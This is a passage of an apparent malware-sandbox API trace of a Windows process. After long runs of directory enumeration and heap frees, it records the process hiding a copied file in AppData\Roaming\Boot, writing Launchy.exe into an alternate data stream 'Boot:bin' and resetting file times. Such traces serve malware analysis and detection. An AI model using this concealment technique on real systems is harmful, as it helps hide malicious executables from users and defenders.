ftLastAccessTime.dwLowDateTime=0x6898433e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6898433e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.743] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.743] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.743] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmlasno.inf_amd64_neutral_c86d5b5e5fa8b48a\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c055e94, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x689aa49f, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x689aa49f, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.743] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.743] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.743] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmlucnt.inf_amd64_neutral_642a5ab3f2a1ae20\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c114576, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68be5943, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68be5943, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.743] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.744] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.744] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmmc288.inf_amd64_neutral_c4a901dab689ad79\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c1d2c57, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68dfac87, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68dfac87, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.744] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.744] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.744] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmmcd.inf_amd64_neutral_49212f5920298e45\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c291338, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68e20de7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68e20de7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.745] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.745] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.745] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmmcom.inf_amd64_neutral_716a306ec3899e04\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c34fa1a, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68e20de7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68e20de7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.745] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.745] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.745] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmmct.inf_amd64_neutral_15bb3ed734fbbeb3\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c43425c, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68e6d0a7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68e6d0a7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.746] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.746] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.746] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmmega.inf_amd64_neutral_f9c441ed24f00358\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c4f293d, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68e93208, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68e93208, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.747] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.747] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.747] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmmetri.inf_amd64_neutral_f89b8a357327f615\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c5d717f, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68eb9368, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68eb9368, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.748] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.748] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.748] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmmhrtz.inf_amd64_neutral_10affee00545fb45\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c6e1b20, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68f2b789, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68f2b789, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.748] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.749] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.749] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmmhzel.inf_amd64_neutral_1292ec506cfc26db\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c85e8e3, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68f9dbaa, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68f9dbaa, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.749] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.749] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.749] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmminij.inf_amd64_neutral_7c300346e830b2dc\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c969285, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6903612b, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6903612b, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.750] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.750] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.750] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmmod.inf_amd64_neutral_5766736c47b90fff\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4ca01806, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x690823eb, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x690823eb, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.750] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.750] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.750] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmmot64.inf_amd64_neutral_1abbad2f29c8fa08\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x507bf318, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6c1285e5, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6c1285e5, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.751] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.751] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0061.945] lstrcpyW (in: lpString1=0x72a744, lpString2="Boot" | out: lpString1="Boot") returned="Boot" [0061.946] CopyFileW (lpExistingFileName="\\\\?\\C:\\Windows\\system32\\Speech\\Common\\sapi.dll" (normalized: "c:\\windows\\system32\\speech\\common\\sapi.dll"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Boot" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\boot"), bFailIfExists=1) returned 1 [0062.045] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Boot", dwFileAttributes=0x2) returned 1 [0062.046] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x6fb040 | out: hHeap=0x6e0000) returned 1 [0062.046] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Boot", lpString2=":bin" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Boot:bin") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Boot:bin" [0062.046] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Launchy.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\launchy.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa8 [0062.046] GetFileSize (in: hFile=0xa8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x106b90 [0062.046] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x106b92) returned 0x1d70020 [0062.047] ReadFile (in: hFile=0xa8, lpBuffer=0x1d70020, nNumberOfBytesToRead=0x106b90, lpNumberOfBytesRead=0x18feb8, lpOverlapped=0x0 | out: lpBuffer=0x1d70020*, lpNumberOfBytesRead=0x18feb8*=0x106b90, lpOverlapped=0x0) returned 1 [0062.087] CloseHandle (hObject=0xa8) returned 1 [0062.087] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Boot:bin" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\boot:bin"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa8 [0062.088] WriteFile (in: hFile=0xa8, lpBuffer=0x1d70020*, nNumberOfBytesToWrite=0x106b90, lpNumberOfBytesWritten=0x18fec4, lpOverlapped=0x0 | out: lpBuffer=0x1d70020*, lpNumberOfBytesWritten=0x18fec4*=0x106b90, lpOverlapped=0x0) returned 1 [0062.120] SetEndOfFile (hFile=0xa8) returned 1 [0062.120] CloseHandle (hObject=0xa8) returned 1 [0062.138] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x1d70020 | out: hHeap=0x6e0000) returned 1 [0062.145] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Boot:bin" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\boot:bin"), dwDesiredAccess=0x100, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa8 [0062.145] SetFileTime (hFile=0xa8, lpCreationTime=0x7912b8, lpLastAccessTime=0x7912b8, lpLastWriteTime=0x7912b8) returned 1 [0062.145] CloseHandle (hObject=0xa8) returned 1 [0062.145] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70c948 | out: hHeap=0x6e0000) returned 1 [0062.147] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70c9f0 | out: hHeap=0x6e0000) returned 1 [0062.148] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70caa8 | out: hHeap=0x6e0000) returned 1 [0062.148] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70dba0 | out: hHeap=0x6e0000) returned 1 [0062.148] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70dc40 | out: hHeap=0x6e0000) returned 1 [0062.148] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70dce0 | out: hHeap=0x6e0000) returned 1 [0062.148] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70dd80 | out: hHeap=0x6e0000) returned 1 [0062.148] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70de30 | out: hHeap=0x6e0000) returned 1 [0062.148] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70dee0 | out: hHeap=0x6e0000) returned 1 [0062.148] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70df88 | out: hHeap=0x6e0000) returned 1 [0062.148] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70e030 | out: hHeap=0x6e0000) returned 1 [0062.148] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70e0f0 | out: hHeap=0x6e0000) returned 1 [0062.148] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70e198 | out: hHeap=0x6e0000) returned 1 [0062.148] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70e238 | out: hHeap=0x6e0000) returned 1 [0062.148] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70e2e0 | out: hHeap=0x6e0000) returned 1 [0062.148] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70e380 | out: hHeap=0x6e0000) returned 1 [0062.148] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70e420 | out: hHeap=0x6e0000) returned 1 [0062.148] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70e4c8 | out: hHeap=0x6e0000) returned 1 [0062.148] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70e568 | out: hHeap=0x6e0000) returned 1 [0062.148] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70f870 | out: hHeap=0x6e0000) returned 1 [0062.148] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70f940 | out: hHeap=0x6e0000) returned 1 [0062.148] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70fa08 | out: hHeap=0x6e0000) returned 1 [0062.148] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70fad8 | out: hHeap=0x6e0000) returned 1 [0062.148] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70fb80 | out: hHeap=0x6e0000) returned 1 [0062.148] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70fc20 | out: hHeap=0x6e0000) returned 1 [0062.149] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70fcc0 | out: hHeap=0x6e0000) returned 1 [0062.149] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70fd60 | out: hHeap=0x6e0000) returned 1 [0062.149] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70fe00 | out: hHeap=0x6e0000) returned 1 [0062.149] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70fea8 | out: hHeap=0x6e0000) returned 1 [0062.149] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70ff48 | out: hHeap=0x6e0000) returned 1 [0062.149] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70e610 | out: hHeap=0x6e0000) returned 1 [0062.149] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70e6e0 | out: hHeap=0x6e0000) returned 1 [0062.149] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70e7b0 | out: hHeap=0x6e0000) returned 1 [0062.149] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70e880 | out: hHeap=0x6e0000) returned 1 [0062.149] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70e958 | out: hHeap=0x6e0000) returned 1 [0062.149] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70ea38 | out: hHeap=0x6e0000) returned 1 [0062.149] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70eb08 | out: hHeap=0x6e0000) returned 1 [0062.149] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70ebd0 | out: hHeap=0x6e0000) returned 1 [0062.149] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70ec98 | out: hHeap=0x6e0000) returned 1 [0062.149] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70ed60 | out: hHeap=0x6e0000) returned 1 [0062.149] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70ee30 | out: hHeap=0x6e0000) returned 1 [0062.149] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70eef8 | out: hHeap=0x6e0000) returned 1 [0062.149] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70efd0 | out: hHeap=0x6e0000) returned 1 [0062.149] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70f098 | out: hHeap=0x6e0000) returned 1 [0062.149] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70f178 | out: hHeap=0x6e0000) returned 1 [0062.149] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70f250 | out: hHeap=0x6e0000) returned 1 [0062.149] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70f328 | out: hHeap=0x6e0000) returned 1 [0062.149] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70f408 | out: hHeap=0x6e0000) returned 1 [0062.149] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70f4d8 | out: hHeap=0x6e0000) returned 1 [0062.149] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70f5a0 | out: hHeap=0x6e0000) returned 1 [0062.149] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70f678 | out: hHeap=0x6e0000) returned 1 [0062.149] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70f760 | out: hHeap=0x6e0000) returned 1 [0062.149] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70ffe8 | out: hHeap=0x6e0000) returned 1 [0062.149] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7100c8 | out: hHeap=0x6e0000) returned 1 [0062.150] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x710198 | out: hHeap=0x6e0000) returned 1 [0062.150] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x710270 | out: hHeap=0x6e0000) returned 1 [0062.150] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x710340 | out: hHeap=0x6e0000) returned 1 [0062.150] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x710410 | out: hHeap=0x6e0000) returned 1 [0062.150] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7104e0 | out: hHeap=0x6e0000) returned 1 [0062.150] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7105b0 | out: hHeap=0x6e0000) returned 1 [0062.150] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x710688 | out: hHeap=0x6e0000) returned 1 [0062.150] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x710758 | out: hHeap=0x6e0000) returned 1 [0062.150] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x710820 | out: hHeap=0x6e0000) returned 1 [0062.150] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7108f0 | out: hHeap=0x6e0000) returned 1 [0062.150] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7109c0 | out: hHeap=0x6e0000) returned 1 [0062.150] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x710a88 | out: hHeap=0x6e0000) returned 1 [0062.150] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x710b70 | out: hHeap=0x6e0000) returned 1 [0062.150] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x710c48 | out: hHeap=0x6e0000) returned 1 [0062.150] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x712b58 | out: hHeap=0x6e0000) returned 1 [0062.150] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x712c38 | out: hHeap=0x6e0000) returned 1 [0062.150] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x714c20 | out: hHeap=0x6e0000) returned 1 [0062.150] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x712d08 | out: hHeap=0x6e0000) returned 1 [0062.150] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x712dd8 | out: hHeap=0x6e0000) returned 1 [0062.150] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x712ea8 | out: hHeap=0x6e0000) returned 1 [0062.150] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x712f78 | out: hHeap=0x6e0000) returned 1 [0062.150] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x714ce8 | out: hHeap=0x6e0000) returned 1 [0062.150] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x713048 | out: hHeap=0x6e0000) returned 1 [0062.150] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x714db0 | out: hHeap=0x6e0000) returned 1 [0062.150] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x713118 | out: hHeap=0x6e0000) returned 1 [0062.150] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x710d20 | out: hHeap=0x6e0000) returned 1 [0062.150] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7131e8 | out: hHeap=0x6e0000) returned 1 [0062.150] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x714e78 | out: hHeap=0x6e0000) returned 1 [0062.150] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7132b8 | out: hHeap=0x6e0000) returned 1 [0062.151] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x713388 | out: hHeap=0x6e0000) returned 1 [0062.151] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x714f58 | out: hHeap=0x6e0000) returned 1 [0062.151] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x715038 | out: hHeap=0x6e0000) returned 1 [0062.151] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x710df8 | out: hHeap=0x6e0000) returned 1 [0062.151] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x715118 | out: hHeap=0x6e0000) returned 1 [0062.151] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7151c0 | out: hHeap=0x6e0000) returned 1 [0062.151] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x715260 | out: hHeap=0x6e0000) returned 1 [0062.151] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x715310 | out: hHeap=0x6e0000) returned 1 [0062.151] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7153b0 | out: hHeap=0x6e0000) returned 1 [0062.151] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x715458 | out: hHeap=0x6e0000) returned 1 [0062.151] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x715500 | out: hHeap=0x6e0000) returned 1 [0062.151] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7155c0 | out: hHeap=0x6e0000) returned 1 [0062.151] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x715668 | out: hHeap=0x6e0000) returned 1 [0062.151] HeapFree 